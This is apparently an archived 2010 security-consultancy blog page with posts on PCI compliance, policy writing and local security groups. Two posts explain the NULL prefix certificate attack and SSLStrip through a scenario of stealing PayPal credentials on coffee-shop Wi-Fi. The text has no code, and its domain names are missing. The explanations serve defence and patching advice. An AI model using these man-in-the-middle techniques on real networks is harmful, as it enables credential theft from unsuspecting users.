Wednesday, December 15, 2010

Do Your Homework

Every one of our competitors says they perform penetration testing. We’ve found that what they call penetration testing often times is nothing more than a vulnerability scan with automated tools.

Read more!

Thursday, December 9, 2010

Why You’re Probably Not Ready for DLP Software

Data Loss (or Leakage) Protection (DLP) has been a hot topic for a while now, and while as a concept DLP has a lot of merit, most organizations are not ready to implement.

Read more!

Thursday, December 2, 2010

Reassess Your PCI Scope: Virtual Terminals

At the annual PCI Community Meeting in September, the PCI Security Standards Council (SSC) made it clear that interpretation of the standard and requirements has not been performed in the same manner throughout the industry. Some of the goals of the new standard are to improve verbiage in order to clarify the intent of individual requirements and understanding how to scope your cardholder data environment. From my review of the Payment Card Industry (PCI) Data Security Standard (DSS) version 2.0, things are definitely clearing up.

Read more!

Tuesday, November 23, 2010

A (quick) theorem on the symbiosis of Risk Management, Security, Operations, and Audit in a mature Security Program -or - How I Learned to Stop Worrying and Love the Venn

Recently I had a conversation with a colleague about the relative symbiosis among organizational divisions and how it always plays a huge role in the effectiveness of a given process. We agreed that this is particularly true when that process involves securing information that is critical to the business. Because of the importance of segmenting responsibilities between groups, the protection of information brings about many unique challenges that can call into question divisional roles. For example: Who within the organization defines what information is critical? Who within the organization is responsible for the actual implementation of security controls? Who confirms compliance to agreed-upon standards? Who is in charge of accepting risk for the organization? And perhaps most importantly, how should these groups or individuals align and interact with one another?

Read more!

Monday, November 15, 2010

Padding Oracle Attack

Whenever I talk about the padding oracle attack the common response is “we don’t use oracle.“ While Oracle has its own list of vulnerabilities this is not the oracle we will talk about here. The padding oracle attack has been out for a while in applications such as ruby on rails and JavaServer faces. It has gained recent fame due to the discovery of it affecting This vulnerability was so serious Microsoft put out an out of band or emergency patch. Before I go any further, stop reading and PATCH your systems.

Read more!


Although the PCI regulation is great for making companies which otherwise would do nothing with regard to security do something, I often find myself questioning the logic of the Payment Brands. Merchants that fall below a Level 1 or rather have a transaction volume less than 6 million annually (with regard to VISA, Mastercard, and Discover transactions) only have to fill out a self assessment questionnaire in order to show PCI compliance. As of right now, there have been no formal qualifications/guidelines for those filling out the SAQ. In other words, the Payment Brands have not defined a specific skill set or position within an organization that should be responsible for filling out this questionnaire.

So essentially, anyone from internal audit to network administration may have the responsibility of filling out this SAQ. Next year this will change for Level 2 merchants (between 2 million and 6 million transactions) that take MasterCard transactions when MasterCard starts requiring these organizations to have either an onsite assessment performed by a QSA or someone officially trained from that organization to become an Internal Security Auditor (ISA). Although I commend Mastercard for taking this additional step and I hope other payment brands follow suit, shouldn’t those responsible for filling out the SAQ in any size organization, whether you are a Level 2 or a Level 4, be qualified to do so? Doesn’t requiring only Level 2 merchants to have someone undergo appropriate training, imply that an individual in a smaller organization who is filling out an SAQ does not have to be qualified? This is pretty scary when you consider that it is a matter of one credit card transaction that could keep you from meeting that 2 million transaction threshold.

Look, all I am trying to say is that more times than not, I am seeing that companies are assigning someone to fill out an SAQ who does not have the security expertise to properly assess whether controls are implemented in accordance with PCI. These individuals think they understand the control requirements but most times do not. Is this a knock against these people? Absolutely not. Most times these individuals’ job functions don’t require them to have the needed security experience to properly assess their cardholder environment.

I understand the reasoning behind using the SAQ, which is: smaller organizations may not have the budget to have an onsite assessment performed. Unfortunately, there is a cost associated with doing business. In my opinion, if you as an organization choose to take credit cards, than you also choose to become PCI compliant. This should, in every instance, entail bringing in a 3rd party to assess those controls; after all, does GLBA or SOX allow a company to fill out an SAQ?

Read more!

Monday, November 8, 2010

Decoding PHP Backdoor

I recently received a request to analyze a suspicious PHP page captured from a user’s Internet history. On the surface it was a typical investigation regarding inappropriate use of a company system based upon the name of the PHP page: “sex.php”. But there was more to this page aside from the content that generated the initial concern. It was the probability that pages such as these use common techniques to deploy adware, spyware, or session-stealing capabilities. In this particular case the code was a fully functional PHP command and control application, and I determined it was a variant of the original 2008 Chinese version called “phpspy.”

Read more!

Wednesday, October 20, 2010

May I Have Some Security with My Switching?

Over the past decade, we have witnessed a transition within security. From a product standpoint, we have started to depart from the dichotomy of IT centric versus security focused products. This divergence can be witnessed in network switches. In the past, security was focused on the perimeter with little attention given to the internal network. Behold the security in a box product, the firewall. A few years ago, a router/switch was purely dedicated to performance and moving packets from one location to another. Now we have seen these products incorporate features such as Dynamic ARP Inspection (DAI), dot1x for port authentication, DHCP Snooping, and much more. Lately Cisco has been focusing on this transition.

Read more!

Thursday, October 14, 2010

Want Budget; Use Metrics

We have all heard the business adage that you cannot manage what you don’t measure. For those in Information Security or Information Technology, this can have far-reaching implications. Without concrete data to query and present, business unit leaders are left wanting. It is difficult to grasp the importance of security or its necessity if there is nothing to back it up. A sound Metrics Program can help.

Read more!

Thursday, October 7, 2010

The Five-Step Compliance Shuffle

If you are in charge of IT and/or Security and you do not have that compliance and/or auditor twinkle in your eye, you might twinge each time someone says PCI, HIPAA, ISO, GLBA, SOX, or any other regulation or evil acronym that might be thrown your way. Depending on your environment and your experience with compliance, the hardest part is knowing what applies within your organization. If faced with an auditor, or even worse, a court room, you will have to show due diligence and due care. As they used to say at the end of every GI Joe cartoon: “Knowing is half the battle!” Due diligence is just that: knowing, researching, and understanding what regulations apply within your organization and how your organization complies with them. Due care is the act of implementation and remediation of issues found and showing that the proper controls are in place and are effective. Please note that this is a high level methodology to compliance. Additional assessment and expertise may be required depending on the size of the organization and what regulations were found to apply to the organization.

Read more!

Thursday, September 16, 2010

Join The Community – Cleveland Security Groups

Say what you like about Cleveland. One thing you cannot debate is Cleveland has a very strong security community. This can clearly be seen in the number of security groups located in the area. In this blog post I simply provide a list of all the security groups I am aware of in the area. I encourage anyone who is interested in security to attend some of these meetings to learn and network with the security community.

Akron Canton ASIS – Local chapter of ASIS International serving the Akron/Canton area. Group primarily focuses on physical security. Meetings generally occur in the mornings over breakfast and cost $10 to $20. Meetings are not open to the public. If you are interested in attending, either join ASIS or contact me and we can discuss having you attend a meeting as my guest.

ASIS Cleveland - Cleveland Chapter of ASIS International. Like the Akron/Canton group, this one also focuses on physical security. Meetings occur over lunch and cost $15. Meetings are not open to the public. If you are interested in attending, either join ASIS or contact me and we can discuss having you attend a meeting as my guest.

Infragard Northern Ohio Chapter - Infragard is an organization sponsored by the FBI that focuses on protecting critical infrastructure. Meetings are free and often occur in the morning. Meetings that are open to the public are held once a quarter. A number of members-only meetings are also held during the year.

Northeast Ohio Information Security Forum - The NEO InfoSec Forum is an independent security group mainly focusing on technical computer security topics. Meetings occur in the evening on the third Wednesday of the month. Meetings are free and open to the public. A free dinner, usually pizza, is provided.

Northeastern Ohio ISACA – Local chapter of ISACA. Their meetings are generally geared toward auditors and are held every month during the day.

Northeastern Ohio ISSA
– Local chapter of the Information Systems Security Association (ISSA). Meetings generally occur monthly and focus on a range of information security topics. A number of years ago this chapter of ISSA went dormant. However, the local chapter is now under new leadership and they have been very focused on rebuilding the chapter. If you have not been to a meeting in a few years I recommend checking them out under the new leadership.

Ohio Chapter of the HTCIA
- Ohio Chapter of High Technology Crime Investigation Association (HTCIA). This group mainly focuses on computer forensics and investigations.

OWASP Cleveland - Local chapter of the Open Web Application Security Project (OWASP). This group focuses on web application security. Meetings are held quarterly at noon and usually include a free lunch. This is a great meeting to invite your company’s developers to so they can learn about secure coding practices. The Cleveland Chapter of OWASP is also sponsored by SecureState.

Did I miss any? If I did, mention them in the comments.

Read more!

Thursday, September 9, 2010

SSL Wars: The Return Of The SSLi

The content of my last few posts has looked at SSL implementations and vulnerabilities. Today’s post is no different, as I will be discussing the importance of patching vulnerabilities in specific implementations of SSL. I have always found it ironic when vulnerabilities are discovered in technologies which have the sole purpose of providing security. As of late a couple of interesting SSL vulnerabilities have surfaced which caught my attention. The CVE IDs of the two vulnerabilities I will briefly discuss are CVE-2010-2566 and CVE-2009-2510.

CVE-2010-2566 is a vulnerability found in Microsoft’s Schannel.dll. Per Microsoft’s Security Bulletin Schannel (Secure Channel) is “a Security Support Provider (SSP) that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) Internet standard authentication protocols”. The Schannel vulnerability is a heap based corruption which is the result of “the code that validates client certificate requests sent by the server.” If successfully exploited this vulnerability could lead to remote code execution on the victim’s machines ( In order to exploit this vulnerability, an attacker would need to cause the victim to visit a webpage where the attacker has set up a malicious web server. This vulnerability has been addressed in Microsoft Security Bulletin MS10-049.

We can learn two very important lessons from a vulnerability like this. The first lesson we can learn from this vulnerability is that it is important to apply critical patches as soon as possible. New vulnerabilities are always being discovered and it is critical the patches which remediate these vulnerabilities are applied as soon as possible. The second lesson we can learn from this vulnerability is the fact that there is always a danger when visiting any web site which you do not directly control. Sites which appear shady or have a large number of ads and pop-ups are especially dangerous, but even legitimate sites can be compromised and forced to serve malware to unsuspecting guests. The New York Times fell victim to an attack in which people visiting their website were greeted with a pop-up telling the unsuspecting victim that their machine was infected with Malware and that they should download fake antivirus. Although attacks originating from otherwise reputable websites are not extremely common, it is important to note these kinds of attacks have been found in the wild.

Suppose an attacker were the first one to identify and develop a working exploit for CVE-2010-2566. The attacker could set up a fake website and find ways to entice people into visiting these websites. Upon simply visiting the site, the attacker would have control over the victim’s machine. The scary thought is we are really unsure how many zero days are in the wild. These web servers may be waiting for someone to connect and take control of the victim’s machine.

The second vulnerability I will discuss is CVE-2009-2510. An attack known as the “NULL Prefix Attack” exploits this vulnerability in order to trick a client into connecting to a spoofed site. This vulnerability was first discovered by Moxie Marlinspike and is easily exploitable through his SSLSniff tool ( This vulnerability exists because of the way most SSL implementations treat the fields in the certificates used by the SSL implementations.

SSL uses certificates which are based on the X.509 standard. X.509 certificates are formatted using ASN.1 notation. All string types in this notation are essentially some variation of PASCAL strings. PASCAL strings are stored in memory as a series of bytes. The length of the string is stored in memory followed by the bytes of the actual string data. Therefore the PASCAL string “hello” would be stored in memory as follows “0x060x680x650x6C0x6C0x6F”. This string would be read as follows:

0x06 = The next six bytes are part of this string
0x68 = h
0x65 = e
0x6C = l
0x6C = l
0x6F = o

This vulnerability is the result of the fact that most SSL implementations treat the X.509 fields as C strings instead of PASCAL strings. These SSL implementations use string parsing functions which treat the X.509 fields as C strings. Unlike PASCAL strings C strings are stored in memory as a series of bytes which indicate the end of the string through a NULL character. The C string “hello” would be stored in memory as follows “0x680x650x6C0x6C0x6F0x00”. This string would be read as follows:

0x68 = h
0x65 = e
0x6C = l
0x6C = l
0x6F = o
0x00 = Null character indicating the end of the string.

Because of the differences in the way strings are stored in memory between C and PASCAL a very interesting exploit which uses this vulnerability has been developed. Suppose I own the domain Since I own I can obtain certificates for this domain signed by a trusted signing authority like VeriSign. Since I own this domain I can also own valid certificates for any sub domain of like, or even\ (\0 is the literal constant for the NULL character). Since X.509 fields are formatted with ASN.1 notation, having a NULL character in the Common Name is not a problem. The problem occurs when the web browser treats the Common Name as a C string and tries reading the Common Name field. The web browser would read the certificate’s Common Name all the way up to “\0”; because of this the browser would see the Common Name in the attacker’s certificate as The common name is identical to the domain name of the website and the browser will connect to the attacker without giving any error messages to the victim. I will try to give the NULL prefix attack greater context by showing an example of how it can be utilized.

I am an evil hacker who goes by the hacker handle “Cain” and I own the domain I decide I would like to use the NULL Prefix Attack to steal victim’s PayPal credentials. I download SSLSniff and have a certificate created for\ I have the certificate for\ signed by VeriSign and head over to my favorite coffee house in the galaxy . . .Mos Eisley Cantina (Yes. . .In my world they serve coffee here as well). The coffee house has free public Wi-Fi and within minutes I am Man in the Middling the entire coffee house’s traffic. I passively monitor and forward customer traffic waiting for someone to go to A man in the coffee house named Belinda is browsing a scented candle website when he finds a cinnamon macadamia chocolate scented candle that he cannot live without. Belinda goes to to make sure his account information is up to date before making his $5000 candle purchase. Belinda enters “” in his browser and presses “ENTER”. SSLStrip intercepts the request to PayPal and presents the victim’s web browser with its own certificate of\ The browser checks the certificate to see if the certificate’s Common Name (\ is actually the name of the site Belinda typed into his browser ( Belinda’s browser starts to read the certificate’s Common Name until it reaches the NULL character, at which point the browser believes it has reaches the end of the Common Name. The browser believes my certificate’s Common Name is, it verifies the certificate has not expired, and it verifies the certificate was signed by a trusted certificate authority (In this case VeriSign). Belinda’s browser creates a secure connection with Cain’s machine believing it to be SSLStrip then establishes a secure connection with My machine acts as a secure proxy by encrypting all traffic between my machine and Belinda’s machine, decrypting the information on my machine, and forwarding the information over the secure tunnel already established with PayPal. Using this information I go out and buy a new computer with Belinda’s PayPal account.

The CVE-2009-2510 vulnerability teaches us two great lessons. First we can see once again the importance of patching. This vulnerability in the Microsoft CryptoAPI is addressed in Microsoft Security Bulletin MS09-056. Please note that other SSL implementations which are vulnerable to this attack may have a different CVE ID and will require a different patch. The second lesson we can learn from this vulnerability is that there are additional risks associated with connections made over a possible hostile network (Like coffee houses, airports, TOR tunnels, etc). The NULL Prefix Attack could easily be implemented before patches to remediate this vulnerability were available. In addition to the NULL Prefix attack, attackers may implement attacks based on the SSLStrip tool (Addressed in my previous blog), generate self signed certificates pretending to be legitimate sites (Addressed in a different blog), or implement a number of other attacks which are associated Man in the Middle scenarios. There should always be a level of caution when connecting to an un-trusted network.

By Gary McCully, Information Security Staff Consultant

Read more!

Tuesday, September 7, 2010

Information Security Policies and Procedures, Part 6

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 2 , Part 3 , Part 4 , Part 5

Knowing Your Audience

A natural human behavior is assuming that the majority of the world’s people are similar to us; similar in thoughts, assumptions, knowledge, opinions etc. Psychologists may see this as the consensus effect, a form of cognitive bias. If you love ballet, you likely assume that far more people also like it than actually do.

What does this have to do with documentation?

When creating the various types of documentation, it is important to know your audience and understand their comprehension of the topic. In many cases, things that are second nature to you will be completely foreign to the majority of the world. If you are reading this, chances are you know what https means, but there are many people who only know that it sometimes goes in front of a web address, if they even know that.

For general distribution documentation, including companywide policies, you generally want to stay around a fifth grade reading level. (If you want to know why, fire up your favorite search engine and enter “reading comprehension levels of college graduates.”) Of course, nothing is ever that easy, because on the other side of the coin you want to make sure that you aren’t talking down to certain audiences. If you are creating a highly technical specification to be used solely by engineers, you can leave out the explanations of basic math.

Also keep in mind that the same word or abbreviation can have multiple meaning to multiple audiences. DC? To tech folks, that is the datacenter. If you work in a warehouse, it is the distribution center. Electricians will take it as Direct Current. To generation Y, DC is a shoe company, and to their parents it is a comic book company. DC is also shorthand for the District of Columbia. The list could go on and on, and that is just one example. So be certain to explain any abbreviations or acronyms the first time you use them within each document.

We must also consider not just denotation, but also connotation, especially in view of the vast range of connotations a general audience may have. The right amount of detail is essential. This becomes even more important when users may not be native speakers of English.

Writing to the correct audience is one of the most important elements of creating effective documentation. If the documentation is too technical for the audience, they will not understand it and likely not read it. Conversely, if the documentation is too simple for the audience, they may skim over important points.

In the next installment, we will discuss some of the intricacies of language. Should you read it, or must you read it?

Read more!

Friday, September 3, 2010

Getting OSSEC To Parse Auditd

“Everyone wants a log
You're gonna love it, log
Come on and get your log
Everyone needs a log
log log log” – Ren and Stimpy

Read more!

Monday, August 30, 2010

Information Security Policies and Procedures, Part 5

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 2 , Part 3 , Part 4 , Part 6

In this installment, we will discuss fonts, and then move on to additional structural elements necessary in documentation, starting with policies.

Does the font matter? Certainly. As I mentioned in a previous post, if your organization has a corporate style guide, the font and document layout is likely already determined. However, if you are blazing a trail through the documentation, you will need to choose a font. If you are planning on distributing hard copies of your documents, a Serif font is easiest on the eyes. For documentation meant to be viewed on a monitor, a Sans Serif font is best. Of course, rare is the document that is viewed in one format only. Lucky for us, Microsoft has come up with a font designed to be easy to read both on screen and when printed; this font is Calibri.

Side Note: Serif? Sans Serif? Seriously? For those of you who are not familiar with typography, serif fonts are those with serifs, the little embellishments on the letters. Think Times New Roman. Sans Serif, as students of French will note, are fonts without serifs. Perhaps the best known example, at least to a generation raised with computers, is Arial. If you have any confusion, type a few letters in Arial and Times New Roman and compare them side by side. (In case you don’t think typography is cool, read Steve Jobs’ 1995 commencement address to Stanford “I decided to take a calligraphy class to learn how to do this. I learned about serif and san serif typefaces, about varying the amount of space between different letter combinations, about what makes great typography great. It was beautiful, historical, artistically subtle in a way that science can’t capture, and I found it fascinating.”) So when you refer to your documentation as a work of art, Mr. Jobs may concur.

Before we get too far down the road into typography (kerning anyone?), let’s move on to some additional structural elements necessary in documentation, starting with policies. In addition to the elements discussed in previous posts, policies need a few standard sections.

These sections include purpose, scope, policy details, and enforcement. You may also wish to include a section with definitions or relevant standards/laws.

The purpose section should include information about why the policy is necessary. You may also wish to add some information about how the issue was dealt with historically. It is also a great place to reiterate some company values. An example is “To ensure compliance with (regulation) and create a more secure environment, this company has implemented this policy…“ Some policies will require a paragraph to get the point across, while others may only need a line or two.

The scope is generally fairly straightforward. To whom does the policy apply? Employees? Contractors? Visitors? To what facilities does this policy apply? To what systems? And so on and so forth.

The policy details section is one into which we will take a much deeper dive in a future post. For now, just know that this section enumerates the rules of the policy. It may also refer to related procedures.

The Enforcement section is where you outline the consequences for non compliance. Is it up to and including termination? A written warning? Be sure to involve HR and Legal in this part.

As we continue in this series, we will expound on each of these areas. Hopefully by now you are feeling more comfortable with documentation development. Please feel free to email me any questions or ask them in the comments section below.

In the next installment, we will discuss knowing your audience.

Read more!

Thursday, August 26, 2010

SSL Wars: The SSL Strikes Back

In my last few posts I reviewed some of the SSL type vulnerabilities. These vulnerabilities were the result of SSL misconfigurations. Today I will address a client side SSL/TLS exploit.

How many people do you know who access secure websites by typing HTTPS:// in the address field of their browser? The vast majority of people just place the website name ( in the address field of their browser and let the chips fall where they may. So I guess my question would be “How does the browser know whether to send me to a secure site (HTTPS) or send me to an insecure site (HTTP)”? Does the browser see in the browser and flip a virtual coin to decide whether or not to direct me to an insecure (HTTP) or secure (HTTPS) connection? Does the browser read and think to itself “I bet that site should be established over a secure connection today,” or does the computer just use magic to decide whether to establish a secure connection or not?

I will now attempt to explain the great mystery and technical awe and wonder of how the browser determines whether to establish a secure or insecure connection... Ready... Here goes: If the type of connection is not specified in the address field of the browser (HTTP or HTTPS), then the connection defaults to being established over HTTP. In other words, if I type into my browser, the browser will default to HTTP:// *Whew, That was tough to explain.* So the question is how do I end up using a secure connection (HTTPS) if the browser defaults to a non-secure connection (HTTP)?

In all reality most people only encounter HTTPS through HTTP. In other words, people are directed to secure connections through insecure connections. Secure connections (HTTPS) are generally established through redirects or links.

Let’s discuss how HTTPS is encountered through redirects. Suppose I am the owner of a company which sells bobsleds to people who live in the Sahara desert (I just fired the head of marketing). I set up a website named In order to purchase a sled we require people to provide SSN, Checking Account Number, and three different credit cards using our website. I have a doctorate degree in quantum cryptography so I know that sending all this sensitive information over an insecure connection like HTTP is not a good idea. I decide that if someone tries to access my webpage through HTTP that they should probably be redirected to a secure connection (HTTPS). “Franz” (A desert dwelling hermit from the Sahara desert) decides he wants to purchase a bobsled in case it snows. Franz has heard that the site has the type of bobsleds he is looking to purchase. Bob opens his browser and types into the address field of his browser. The browser sends the request to HTTP:// The request is sent to my website which promptly tells Franz’s browser that it must use HTTPS to connect to The web browser is redirected to HTTPS:// Franz purchases his bobsled and the world is right again.

The second way that people generally encounter HTTPS is through links. Suppose that a site is dedicated to the hottest companies who sell bobsleds to people who live in the Sahara desert. Nothing on the website is confidential so the site does not require a secure connection (Everything is sent through HTTP). The site has links which redirects people who wish to purchase one of these bobsleds to hot sleds for hot climates. The link which points to hot sleds for hot climates is HTTPS:// Franz (Our beloved hermit) is reviewing the site dedicated to the hottest companies who sell bobsleds to people who live in the Sahara desert and decides that he must purchase a bobsled from one of these companies. In a moment of weakness Franz decides to use his children’s college fund to purchase a bobsled (The sleds are very expensive). He selects the link for HTTPS:// and is quickly sent to a secure site where he can purchase the bobsled of his dreams. Franz purchases his bobsled and everyone is happy (except for his poor kids who will now be forced to attend a small community college).

So to reiterate, people encounter HTTPS through HTTP (More specifically, redirects and links). So what is stopping attackers from intercepting all links and redirects which tell the browser to use HTTPS and replace them with links which point to HTTP? Why can’t attackers place themselves between the customer (Franz) and the web site and modify all redirects and links destined for HTTPS and replace them with links to HTTP? What would stop an attacker from setting up an insecure connection with the customer and a secure connection with the website and act as a middleman between them? The answer to these questions is: essentially nothing! In fact, a tool named SSLStrip performs this type of attack with minimal effort.

SSLStrip works as follows. An attacker performs a man in the middle attack to place themselves between the client and the server. Whenever SSLStrip sees links or redirects which try to send the customer to a secure connection (HTTPS), it replaces the links with insecure versions of these links (HTTP). SSLStrip sets up a secure connection with the site HTTPS:// and an insecure connection with the customer HTTP:// even places a padlock favicon in the corner of the customer’s browser to make them think they are connected over a secure connection. The attacker takes the information sent from the customer (Username, Password, SSN, Credit Cards) and logs them to a file for future review. The attacker then uses their secure connection with the server to forward this information to the web server.

So what should you do in order to prevent falling prey to this attack? First, if you type into your web browser or access a link which redirects to a site requesting sensitive information (Username, Password, SSN, Credit Card, etc), manually verify you are redirected to a secure connection HTTPS:// This can be accomplished by looking at the web address listed in the browser and verifying the address starts with HTTPS. Although this safeguard may make it more difficult for an attacker to exploit this vulnerability, a dedicated attacker using an advanced Homograph attack may still be able to successfully exploit this vulnerability. Second, you can manually type HTTPS:// before the website you are trying to access. This will verify the connection is immediately connected through HTTPS and is never sent through HTTP redirects. Once you access the site through manually placing HTTPS// before the site name, the site can be saved as a bookmark for quick access over SSL in the future.

-Gary McCully

Read more!

Information Security Policies and Procedures, Part 4

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 2 , Part 3 , Part 5 , Part 6

The formatting and structure of documentation may not seem like the most enthralling topic, and in many (most) ways it is not. It is however one of the most important elements of effective documentation. Delivering information in a clear and consistent way is essential to ensure documents are easy to use and effective. From your organization’s logo to the approval of the board, documentation should look, feel, and be official. Even fonts can make a difference. If you work for an organization large enough to have a style guide and/or documentation standards, much of the structure, format, look, fonts, etc. will be laid out for you. For those who are blazing the path, however, you must be prepared to make several decisions prior to developing documentation.

It is almost always easiest to design a template and determine style and formatting before putting the figurative pen to paper (hands to keyboard). (Truth be told, I cannot think of a single example where it would be better to develop documentation before developing a template, but I am doing my best not to speak in absolutes. If you have any examples to prove me wrong, please by all means share them in the comments or email me directly.)

Unfortunately, due to time and other constraints, I will not be going into great detail of the intricacies of creating and formatting templates and using styles. If you plan to have any lengthy involvement in document development, I highly recommend spending some time becoming comfortable with the advanced features of your word processing program of choice. While I think it is safe to say that many feel they are expert users of the Microsoft Office suite, there are many powerful features that many who consider themselves “power users” are unaware of. Get to know the styles, template features, and table structure. Time spent up front creating a bullet proof and consistent template and related style rules will pay immense dividends in saved time and effort down the road.

As our focus in this series is policies and procedures, we will start there. In the header, at minimum include the title, revision number, effective date, and your organization’s logo. The reason for the title should be fairly clear. Including your logo will make the document immediately identifiable as belonging to your organization. The effective date and revision data allow users to identify that they are using the correct version of the document.

In the footers, include copyright information as well as page numbers. Page numbers are important, especially with longer policies and procedures, to ensure that users know that they are looking at a complete policy and not just a page or two.

The footer is also a good place to include the document classification. As we discussed in earlier posts, some policies and procedures will be more sensitive than others. It is important to label documents so that users understand their proper handling. If you do not have an asset classification program, we strongly suggest you implement one as asset classification is one of the main building blocks of an effective information security program. Please feel free to contact SecureState’s Risk Management team for details.

Take care to have consistent header and footer designs across your organization’s documentation. I cannot reiterate enough the importance of consistency.

In our next installment, we will continue on formatting and structure and get into the details of what sections and basic information should be included in every policy and procedure.

Read more!

Saturday, August 21, 2010

Hacking Your Location With Facebook Places

Facebook recently released a new feature called "Places" which aims to tap into the growing location based services market made popular by other social networks like FourSquare and Gowalla. Facebook Places allows you to "check-in" to a location with your mobile device. You can check-in with the official Facebook application for the iPhone or Android or you can use the Facebook mobile site: You can use if you have a location aware web browser such as Firefox, Opera or Chrome. In this post we will explore what Facebook Places is, how businesses are going to use it, the privacy and security concerns, and how one can fake a location check-in with a few easy steps.

Read more!

Friday, August 20, 2010

The Importance of Validation

A vulnerability assessment is an important element in understanding a company’s threat profile. When performing a vulnerability assessment, it should include more than just running a scan, printing a pretty report and sending it out to a client, management, or administrator. It must also be about confidence and accuracy. What makes you confident in the report you send to a client, your management, or administrator? What makes YOUR report more accurate than others? Validation. What is validation? Validation is testing a vulnerability that has been found. Depending on how far you dive into validation, it can contain many elements of a penetration test. What makes validation most important is identification of false positives. Every vulnerability scanner, no matter how many bells and whistles it has, will produce false positives. There is no scanner on the market that can find every vulnerability and not produce false positives.

Read more!

Tuesday, August 17, 2010

The DDoS Threat: The New Punctuated Equilibrium

On August 7, 2010, DNS Made Easy underwent an outage that was caused by a Distributed Denial of Service (DDoS) attack. While the outage for many companies was sporadic, it lasted for multiple hours in regions of the west coast of the United States. Over the course of the past eight years, DNS Made Easy has prided themselves on their 100% uptime. A blow like this can affect a company’s public image, hinder their marketing, shift their business strategy, and impact their bottom line. So, how did this happen? Is it preventable? And, what can you do about it? In this situation, it is easy to blame DNS Made Easy and say that they didn’t have the proper security controls in place to withstand this type of attack, but in reality things are not that simple.

Read more!

Information Security Policies and Procedures, Part 3

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 2 , Part 4 , Part 5 , Part 6

While we are still at the beginning stages of preparing to develop policies, procedures, and related documentation, it is important to mention a few things not to do.

Do Not Repurpose/Borrow the Work of Others

Search engines are great, and place a vast body of human knowledge at your fingertips. This vast knowledge often includes the intellectual property of others. Finding policies on the internet and using control H to place your organization’s name in place of another is not only wrong, it is also ineffective. Even if you have policies examples available that are not covered by copyright, they still will not cover everything you need in most situations. Every organization is unique, and as such has unique policy and procedure requirements. By all means, scour the web, libraries, desk drawers, etc. for policies to get ideas for format, structure, and things to include. But be sure to create your own intellectual property.

Do Not Ignore the Input of Others

No doubt you are an expert in your chosen field. However, developing policies and procedures is best done with the input of others. Be sure to speak with the Human Resources department about Acceptable Use, System Access, and other cross functional policies. Talk to your receptionist or security guards to get another perspective for Physical Security and Visitor policies. And certainly, wherever possible seek direction from whoever will be tasked with approving the policies. I am sure you get the idea; I could go on ad infinitum listing people who you should involve in policy creation.

Do Not Overcomplicate Things

I have never been accused of using too few words. However, when writing policies, be sure to be clear and concise. Don’t use two sentences where one will do. (Save that for blogs.) Of course it follows that you need to be thorough enough to make certain that your audience understands what the policy is saying. Finding the perfect balance is never easy, but if you are cognizant of this issue, you will likely be okay. Just remember, there is a reason Hemingway didn’t write policies.

Do not Forget the Audience

There are policies and procedures that will be distributed companywide, and others that will stay within IT. While IT procedures may be filled with the intricacies of required network logging, general policies will need to be geared toward a more general audience.

Do Not Get Stuck in the Weeds

Don’t let small issues derail your documentation project. Keep writing. There will always be debates about minutiae; note these for later resolution and move on. These decisions will need to be made prior to final approval and distribution, but they shouldn’t stop your progress.

Do not Confuse Policies with Procedures

As we discussed in a previous installment, policies and procedures have significant differences. One practical reason to separate policies and procedures involves the approval process. While policies generally go through an approval workflow that includes executive management, many times procedures (especially highly technical IT procedures) can be updated less formally. If procedural steps are embedded in policies, you could find yourself seeking executive approval each time you change software vendors or process minutiae. We will discuss this more in later installments.

In our next installment of this series, we will cover basic document formatting and structure. (Don’t worry; it is not as dry as it sounds.)

Read more!

Thursday, August 12, 2010

XFS 101: Cross-Frame Scripting Explained

Cross-Frame Scripting (XFS) is an attack related to cross-site scripting (XSS) and is commonly misunderstood from both offensive and defensive standpoints. This blog’s aim is to clear up confusion regarding what it means, what vulnerability it is exploiting, and a survey of suggested fixes available.

XFS exploits a bug in specific browsers that allows a parent frame to be exposed to events in an embedded iFrame inside of it. The exposure is limited to events only, and does not give full JavaScript cross domain access. Several examples exist illustrating the sniffing of keystrokes from an embedded iFrame (usually a login page) to an attacker controlled resource such as a remote Web server using an XML HttpRequest (XHR) surreptitiously in the background. This effectively provides a means to silently steal credentials being typed into the embedded iFrame by the victim. This attack in no way allows full JavaScript execution despite being similar to XSS.

Read more!

Tuesday, August 10, 2010

Information Security Policies and Procedures, Part 2

This is part of an ongoing series on documentation development. Please be sure to read the previous posts in this series.

Part 1 , Part 3 , Part 4 , Part 5 , Part 6

Knowing which policies are necessary in your environment can be a challenge. Most organizations will have at least some formalized policies. Many of these are in response to legal requirements (HR policies) or specific incidents. After someone leaves their laptop in the car trunk for 6 hours on a 100 degree day, a policy on the care of equipment is generally issued.

With policies and procedures, it is essential to be proactive rather than reactive. In the case of the melted laptop, it would be far better to have instituted a policy regarding equipment care prior to the incident. That may be a simplistic scenario where the company is out a thousand dollars for a laptop, but it illustrates a point. This proactive posture becomes far more important when applied to more complex situations. What if, instead of being out a thousand dollars for a laptop, you were instead out tens or hundreds of thousands of dollars in fines after a cardholder data breach? Or worse, in the case of HIPAA, you find yourself with tremendous legal bills or in jail. (I am aware that is an extreme case, but it is illustrative of my point.)

As far as information security, every organization will have a unique set of foundational policies. Although there will be many that are common to all organizations, the unique qualities of each organization call for custom policies. How then, do we determine what basic policies we need? I have found that one of the simplest ways to determine which policies are essential is to look at all applicable regulations, laws, standards, and contracts and perform a gap assessment. For example, if you are subject to the PCI DSS, a good way to start is to take a copy of the standard and identify every place where a policy or procedure is required. PCI requires a policy on visitors to your facilities. As such, part of being compliant with PCI will be developing a visitor policy per the specific requirements of the standard. An important caveat: having a policy in place does not equal compliance.

An auditor will not only look for the policy, they will also look for evidence that the policy is enforced. So, for our example of a visitor policy, the auditor will want to see associated visitor logs and will check to see if they are issued a visitor badge per the policy. Careful readers will note that I slipped in mention of another document, the visitor log. In many cases, documentation leads to more documents. In this case, you will also likely need to develop training and awareness programs. Procedures for the receptionist to follow will help ensure that they are correctly logging visitors. An awareness program allows employees to understand that the policy exists as well as the rationale behind the policy.

